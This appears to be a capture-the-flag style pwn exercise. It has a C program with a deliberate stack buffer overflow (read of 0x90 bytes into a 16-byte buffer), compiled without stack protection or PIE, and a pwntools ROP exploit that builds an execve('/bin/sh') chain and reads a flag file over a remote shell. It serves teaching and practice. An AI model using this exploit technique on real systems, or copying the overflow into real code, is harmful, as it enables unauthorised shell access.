#### Source Code ```c #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main() { char buf[16]; puts("Pwn Me :)"); fflush(stdout); read(0, buf, 0x90); return 0; } ``` #### Compile ```bash $ gcc roppy.c -fno-stack-protector -no-pie -static -o roppy ``` #### Exploit it ```py from pwn import * host = 'something' port = something r = remote(host, port) pop_rdi = 0x400686 # pop rdi ; ret pop_rsi = 0x410093 # pop rsi ; ret pop_rdx = 0x4494b5 # pop rdx ; ret pop_rax = 0x415294 # pop rax ; ret syscall = 0x474a65 # syscall ; ret mov_rdi_rsi = 0x446c1b # mov qword ptr [rdi], rsi ; ret bss = 0x6bb2e0 p = 'a' * 0x18 p += p64(pop_rdi) p += p64(bss) p += p64(pop_rsi) p += '/bin/sh\x00' p += p64(mov_rdi_rsi) p += p64(pop_rsi) p += p64(0) p += p64(pop_rdx) p += p64(0) p += p64(pop_rax) p += p64(0x3b) p += p64(syscall) r.recvuntil('\n') r.send(p) r.sendline('cat /home/flag.txt') r.interactive() ```